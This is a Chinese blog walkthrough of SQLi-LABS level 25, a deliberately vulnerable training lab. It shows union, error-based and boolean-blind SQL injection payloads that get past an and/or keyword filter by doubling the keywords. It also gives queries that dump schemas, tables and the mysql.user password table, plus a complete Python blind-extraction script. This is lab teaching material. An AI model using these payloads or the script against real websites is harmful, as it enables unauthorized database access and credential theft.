SQLi LABS Less 25 联合注入+报错注入+布尔盲注

已于 2022-04-15 08:31:49 修改
阅读量1.5w 收藏 8
点赞数 9
分类专栏: SQLi-LABS 靶场通关教程 文章标签: 安全 网络安全
于 2021-06-28 12:54:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118299847
版权

第二十五关单引号字符型注入;

过滤了关键字(and、or),可以使用双写绕过;

这篇文章提供了联合注入、报错注入、布尔盲注三种解题方法。

SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS 靶场通关教程

一、功能分析

这一关是一个查询功能,在地址栏输入id作为参数,后端根据id查询用户信息,并在页面响应。

 

 二、思路分析

后台匹配参数中的and和or,匹配到就会替换为空;

但后台只会匹配一遍,我们复写关键字,即可绕过过滤,使用时替换为 anandd、oorr。

参数中携带单引号,页面返回数据库的报错信息,适合使用报错注入。

 输入不同的id,页面动态显示查询结果的数据,适合使用 联合注入。

 查询成立和不成立时,对应正确和错误两种响应,适合使用报错注入。

三、解题步骤

方式一:联合注入

联合注入的详细使用方法可以参考我的另一篇文章:

联合注入使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1' anandd 1-- a,页面正常显示

地址栏输入:?id=1' anandd 0-- a,页面异常(空)显示

由此可以确定,页面存在单引号字符型注入。

第二步、判断字段数

提示:order 中的 or,也会被过滤,需要双写绕过。

地址栏依次输入:

?id=1' oorrder by 1 -- a

?id=1' oorrder by 2 -- a

?id=1' oorrder by 3 -- a

?id=1' oorrder by 4 -- a

第四个字段排序时,开始报错,确定字段数为:4.

第三步、判断显示位

地址栏输入:?id=0' union select 1,2,3 -- a

第四步、脱库

以获取当前使用的数据库为例,地址栏输入以下payload:

?id=0' union select 1,
	(database())
,3 -- a

其余脱库操作是,将下图中圈中的位置替换成SQL语句即可:

常见的脱库语句如下:

# 获取所有数据库
select group_concat(schema_name)
from information_schema.schemata
 
# 获取 security 库的所有表
select group_concat(table_name)
from information_schema.tables
where table_schema="security"
 
# 获取 users 表的所有字段
select group_concat(column_name)
from information_schema.columns
where table_schema="security" and table_name="users"

# 获取数据库管理员用户密码
select group_concat(user,passwoorrd) 
from mysql.user where user = "mituan"

方式二:报错注入

报错注入的详细使用方法可以参考我的另一篇文章:

报错注入使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1'

页面显示数据库的报错信息,分析报错信息,确定注入点为单引号字符型注入。

第二步、判断报错条件

地址栏输入:?id=1' anandd updatexml(1,0x7e,3) -- a

页面显示报错函数的内容,确定报错函数可用。

第三步、脱库

以获取当前使用的数据库为例,地址栏输入以下payload:

?id=1' aandnd updatexml(1,
	concat(0x7e,
		(database())
		)
,3) -- a

 其余脱库操作时,将下图中圈中的位置替换为SQL语句即可:

方式三:布尔盲注

布尔盲注的详细使用方法可以参考我的另一篇文章:

布尔盲注使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1' anandd 1 -- a,页面正常显示

地址栏输入:?id=1' anandd 0 -- a,页面异常(空)显示

第二步、判断长度

获取当前使用数据库名字的长度,地址栏输入:

?id=1' anandd length(
	(database())
) >1 -- a

 长度肯定大于1,页面正常显示,确定payload可用,从1开始,依次递增测试长度,稍后使用脚本测试。

第三步、枚举字符

获取当前使用数据库名字的字符,截取第一个字符,转换成ASCLL码,判断字符的ASCLL码是否大于1,地址栏输入:

?id=1' anandd ascii(
	substr(
		(database())
	,1,1)
) >1 -- a

 

字符的ASCLL码肯定大于1,页面正常显示,确定payload可用。

依次判断ASCLL码是否等于32~126。稍后使用脚本测试。

脱库

Python自动化猜解脚本如下,可按需修改:

import requests

# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload

# 目标网址(不带参数)
url = "http://9423b2d25db1466eaaf53942d467dc44.app.mituan.zone/Less-25/"
# 猜解长度使用的payload
payload_len = """?id=1' anandd length(
	(database())
) ={n} -- a"""
# 枚举字符使用的payload
payload_str = """?id=1' anandd ascii(
	substr(
		(database())
	,{l},1)
) ={n} -- a"""

# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        response = requests.get(url= url+payload_len.format(n= length))
        # 页面中出现此内容则表示成功
        if 'Your Login name' in response.text:
            print('测试长度完成,长度为:', length,)
            return length;
        else:
            print('正在测试长度:',length)
            length += 1  # 测试长度递增

# 获取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/库名为空
    # 第一层循环,截取每一个字符
    for l in range(1, length+1):
        # 第二层循环,枚举截取字符的每一种可能性
        for n in range(33, 126):
            response = requests.get(url= url+payload_str.format(l= l, n= n))
            # print('我正在猜解', n)
            # 页面中出现此内容则表示成功
            if 'Your Login name' in response.text:
                str+= chr(n)
                print('第', l, '个字符猜解成功:', str)
                break;
    return str;

# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

执行结果如下:

其余脱库操作时,将下图中圈中的位置,替换成SQL语句即可:

 

 

士别三日wyx
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
(手工)【sqli-labs25-25a】报错注入、OR&AND过滤后注入
07-12 796
SQL-过滤后注入
Sqli-labs——lesson25联合查询和报错注入,附各种sql万能密码)
weixin_62281892的博客
07-12 885
25
sql绕过less-23 less-25 less-26 less-27 以及一点http头注入 less-18 less-5
最新发布
weixin_74182283的博客
04-01 1255
拆分该语句 为了完成绕过,需要先将id进行闭合 因此语句为 id='xx' || 1',此时多了个单引号出来,因此需要将其闭合,变成id='xx' || '1',语句为id='xx' || '1' 这时,因为||是可以替代or来进行使用的(这个是学计算机的基本常识),在语法中相当于或者,而此时右边的 '1' 永远为真(因为 '1' 永远都是’1‘ )因此可以通过该语句直接完成绕过。而我们这里的http头注入所运用的报错函数,他就是需要~才能导致报错的出现,因此只要存在波浪线,就可以确保这个函数报错。
sqli-labs 第25关(过滤or和AND )
qq_46527080的博客
12-25 1592
25关 源码分析 发现闭合点是的单引号 将or和AND替换成了空格 然后我们就来思路了,我们可以使用联合查询还有报错查询 一、判断注入点 二、判断列数 发现很直观的把我们的or给过滤掉了 我们试试双写 三、构造payload ?id=-1' union select 1,2,3--+ 1.爆库、 ?id=-1' union select 1,group_concat(schema_name),3 from infoorrmation_schema.schemata --+ 由于information
sqli-labs25
qq_53030229的博客
05-31 460
文章目录一、代码审计二、SQL注入1、获取数据库2、获取数据表3、获取字段 一、代码审计 1、这个是代码和数据库交汇的地方,可以快速判断注入点和闭合方式 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 2、这个是使用了正则匹配过滤掉and和or,i则是大小写都过滤 function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non cas
sqllab第二十五A关通关笔记
I_WORM的博客
03-16 418
构造payload:id=1/0+union+select+1,version(),database()+--+构造payload:id=1/0+union+select+1,2,3+--+构造payload:id=1/0+oorr+exp(710)=1--+构造payload:id=1/0+oorr+1=1--+同理,可以获取数据库其他内容,这里不演示了,收工。发现没有任何的回显信息,说明这里不能用错误注入。发现成功运算了,这是一个数值型的注入。成功显示了内容,可以尝试错误注入。成功回显了输入的内容。
sqli-labs关卡25(基于get提交的过滤and和or的联合注入)
zyh1588的博客
01-16 1211
小白回顾sqli-labs靶场25
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
mysql注入-sqlilabs靶场注入
10-15
sqlilabs靶场全部关卡的详细解析,pdf文档
sqlilabs过关手册注入天书.pdf
09-14
sqlilabs过关手册注入天书.pdf
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sqlilabs,里边赠送包含了,sqlilabs过关手册-注入天书,联系sql注入的绝佳靶场
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php,Tomcat+mysql+java(部分关卡需要) Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改...
LESS-23 LESS-25 LESS-25a
qq_44598397的博客
03-30 276
LESS-23 源码: 以此可知可以通过报错注入等方式 语法: mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int KaTeX parse error: Expected 'EOF', got '&' at position 19: …it = -1 [, int &̲c...
基于Sqli-Labs靶场SQL注入-25~28关
Joker
01-07 1415
这一篇博客我主要讲了各种语句被注释后的绕过方法,包括 and 和 or 的绕过、空格和注释符的绕过、union 和 select 的绕过。
sqli labs less 25
Xiaoxiaoqiang_的博客
03-10 193
屏蔽or 和and
sqli-labs学习笔记(九)less 25-28 各种过滤
闵行小鱼塘
09-15 503
继续学习sqli-labs,本篇是less 25-28
Less-25(绕过or或and--盲注)
老司机开代码的博客
08-04 454
文章目录1. 题目分析2. 注入思路2.1 盲注2.2 联合注入3. SQLmap注入 1. 题目分析 根据less24的经验以及通过?id=1 aandnd 1=2 --+和?id=1 aandnd 1=1 --+可以判断出id的类型为int;并且可以使用盲注联合查询两种方法解决的题目。 一下主要回顾盲注的解题思路: False页面: True页面: 之前学习过盲注,我们知道盲注主要分为布尔盲注和时间盲注,同时再回忆一下要使用的函数: length() :判断字长 substr(): 从字符串中取
sqli-labs————less 25(绕or\and)
Fly_鹏程万里
05-12 981
Less-25从关卡提示,我们可以知晓该关卡主要过滤了“or”和“and”,那么我们看看它的源代码到底是如何过滤的:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns...
sqli-labs-less25-less25a
沐目的博客
04-10 498
less-25 单引号 GET型 一道水题,就是让我们感受一下过滤,只是过滤了or和and。 就是用很基础的union 查询就可以了。但是注意一下,在写information的时候,它会把“or“给过滤掉,但是我们可以使用双写绕过。 数据库: -1’ union select 1,2,database() %23 表和字段: -1’ union select 1,group_concat...
sqli labs less1 介绍
07-11
Less 1 是 SQLi Labs 中的第一个挑战,它旨在帮助用户了解基础的 SQL 注入概念和技术。在这个挑战中,你需要找到一个存在 SQL 注入漏洞的页面,并尝试注入恶意的 SQL 代码来获取敏感信息。 具体步骤如下: 1. 打开...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值